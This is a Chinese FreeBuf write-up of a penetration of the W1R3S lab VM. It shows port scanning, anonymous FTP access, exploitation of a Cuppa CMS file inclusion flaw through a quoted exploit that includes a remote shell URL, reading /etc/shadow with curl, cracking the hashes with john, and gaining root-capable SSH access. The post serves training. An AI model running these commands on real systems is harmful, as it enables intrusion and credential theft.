freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

w1res靶场渗透笔记
w1res靶场渗透笔记
woodpecker 2023-02-15 12:34:09 99432
所属地 四川省

信息收集

  1. 主机发现
nmap -sn 192.168.18.142/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 16:44 CST
Nmap scan report for 192.168.18.1
Host is up (0.0016s latency).
MAC Address: 30:AE:7B:E3:91:3F (Deqing Dusun Electron)
Nmap scan report for HF-LPB130.lan (192.168.18.111)
Host is up (0.92s latency).
MAC Address: 98:D8:63:D4:38:DA (Shanghai High-Flying Electronics Technology)
Nmap scan report for 192.168.18.123
Host is up (0.0017s latency).
MAC Address: 8C:AB:8E:7D:2C:F3 (Shanghai Feixun Communication)
Nmap scan report for nova_4-bb05f30450e33d1f.lan (192.168.18.165)
Host is up (0.036s latency).
MAC Address: 14:3C:C3:B7:9A:7F (Huawei Technologies)
Nmap scan report for LAPTOP-1DVA2N7.lan (192.168.18.197)
Host is up (0.00017s latency).
MAC Address: 40:74:E0:20:72:D1 (Intel Corporate)
Nmap scan report for W1R3S.lan (192.168.18.216)
Host is up (0.0013s latency).
MAC Address: 00:0C:29:53:6C:C0 (VMware)
Nmap scan report for kali.lan (192.168.18.142)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 5.27 seconds
  1. 端口扫描
nmap -sS -sV -T4 -O 192.168.18.216  
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 16:50 CST
Nmap scan report for W1R3S.lan (192.168.18.216)
Host is up (0.00038s latency).
Not shown: 966 filtered tcp ports (no-response), 30 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:53:6C:C0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.86 seconds
  1. 端口脚本扫描
Nmap scan report for W1R3S.lan (192.168.18.216)
Host is up (0.00024s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /wordpress/wp-login.php: Wordpress login page.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:53:6C:C0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 321.12 seconds

漏洞发现

21端口漏洞测试

发现21端口

ftp 192.168.18.216
Connected to 192.168.18.216.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.18.216:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43950|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.
ftp>

利用mget 命令下载文件

┌──(root㉿kali)-[~/Desktop/project/w1r3s/ftpDown]
└─# ls
01.txt  02.txt  03.txt  employee-names.txt  worktodo.txt

01.txt无重要信息

解密02.txt

01ec2d8fc11c493b25029fb1f47f39ce

SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
# 识别密码类型
hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce
# 利用在线解密获得原文
01ec2d8fc11c493b25029fb1f47f39ce:This is not a password

# base64解密
echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d
It is easy, but not that easy..

收集到员工信息

cat employee-names.txt 
The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

解密worktodo.txt信息

利用网站解密

ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
ı don't thınk thıs ıs the way to root!

we have a ןot of work to do‘ stop pןayıng around˙˙˙˙

21端口基本利用完

80端口漏洞测试

  1. 先简单访问一下页面,无更多结果
  2. 扫描目录
"1","http://192.168.18.216/administrator/  --------> installation/","302"
"2","http://192.168.18.216/administrator/  --------> installation/","302"
"3","http://192.168.18.216/index.html","200"
  1. 访问administrator页面,发现是安装界面,且是cuppa cms
  2. 对安装界面进行简单渗透
  3. 先利用kali上的searchsploit进行简单检索
┌──(root㉿kali)-[~/Desktop/vulhub]
└─# searchsploit cuppa cms         
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                                                             | php/webapps/25971.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
  1. 将文件下载到本地进行查看
# 下载到本地
searchsploit cuppa cms -m 25971

# 查看
cat 25971.txt 
# Exploit Title   : Cuppa CMS File Inclusion
# Date            : 4 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version         : Beta
# Tested on       : Window and Linux

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22:
        <?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------

Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "Db@dmin";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";
	}
?>
-----------------------------------------------------------------------------

Able to read sensitive information via File Inclusion (PHP Stream)

################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
  1. 利用文件包含漏洞进行测试

这里的提交方式只支持post,路径中的cuppa是扫描出的administrator

利用kali的curl或者hackbar进行测试

curl方式:

curl --data-urlencode  http://192.168.18.216/administrator/alerts/alertConfigField.php

curl还可配合html2text获取更简洁的内容

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.18.216/administrator/alerts/alertConfigField.php | html2text

hackbar方式:

1676434926_63ec5dee7b9db4db00039.png!small?1676434928377

  1. 尝试拿shadow文件
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.18.216/administrator/alerts/alertConfigField.php
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::

清理出3条重要数据

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
  1. 用john识别破解密码
john hashdow 
Created directory: /home/kali/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data         (www-data)     
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer         (w1r3s)

可以看到两组已经被破解

www-data         (www-data)
computer         (w1r3s)
  1. 尝试ssh登陆
# 登陆
sudo ssh w1r3s@192.168.18.216

# 登陆成功后查看权限
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S.lan:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.lan:
    (ALL : ALL) ALL

w1r3s@W1R3S:~$ uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

w1r3s@W1R3S:~$ whoami
w1r3s

发现权限为ALL,至此渗透结束

总结

  1. 对21端口的总结
    1. 21端口存在的漏洞有3种:
    • anonymous的未授权访问
    • 弱口令破解
    • vsftpd服务后门
    1. 21端口的利用方式:

常常是看文件信息,是否泄露敏感信息等。

  1. 对文件包含的总结
    1. 可以获取敏感文件如:hashdow、/etc/passwd等文件
    2. 可以和文件上传漏洞结合实现getshell
  1. 整体总结
  • 效率总结:总体渗透思路要清晰(否则会做重复性工作,效率大大降低),收集到的任何信息做一个整理(否则会存在某些重要信息的忽视),先进行熟悉的工作(或许熟悉的操作已经足够拿到shell)。
  • 渗透思路总结:
    • 先进行主机存活扫描
    • 根据存活主机,扫描其端口、端口详细信息、主机类型
    • 根据端口进行渗透测试(不熟悉的端口,进行检索是否存在漏洞,不存在直接跳过该端口)
    • 清除足迹
    • 总结
  • 其他总结:细心会学到跟多东西,弱小才会成长。

其他

若有疑问,下面视频有详细的讲解

【「红队笔记」学渗透必打百台靶机实操精讲-W1R3S】 https://www.bilibili.com/video/BV1mB4y1j7K6/?share_source=copy_web&vd_source=7fa3855f45362f8b2340544a37a98ec7

# 渗透测试 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 woodpecker 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
CORS结合XSS利用 原创
CORS结合XSS利用

漏洞

这两个漏洞想必大家都有过了解,但是对于结合使用方面或许有些不清楚的点,我总结归纳了利用方法和原理。

Erichas

215613围观 2023-02-21

CTFer成长之路之任意文件读取漏洞 原创
CTFer成长之路之任意文件读取漏洞

Web安全

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

儒道易行

131375围观  · 11喜欢 2023-02-21

根据IP地址登记信息进行目标信息收集 原创
根据IP地址登记信息进行目标信息收集

工具

根据IP地址登记信息进行目标信息收集。

SleepingBag

266289围观  · 3收藏  · 43喜欢 2023-02-21

APT组织Bitter网络间谍攻击活动实例分析
APT组织Bitter网络间谍攻击活动实例分析

Web安全

攻击者通过利用Office的公式编辑器组件(EQNEDT32.EXE)漏洞,投放恶意诱饵文档和中间恶意软件来部署远程访问木马。

中孚信息

241228围观  · 3收藏 2023-02-21

越权检测工具IDOR_detect_tool
越权检测工具IDOR_detect_tool

工具

SaaS-API越权漏洞检测系统概述通过替换认证信息后重放请求,并对比数据包结果,判断接口是否存在越权漏洞详细介绍:水平越权挖掘技巧与自动化...

进击的HACK

247040围观  · 1收藏 2023-02-20

woodpecker LV.2
这家伙太懒了,还未填写个人描述!
  • 2 文章数
  • 0 关注者
jarbas靶场渗透笔记
2023-02-15
文章目录
21端口漏洞测试
    80端口漏洞测试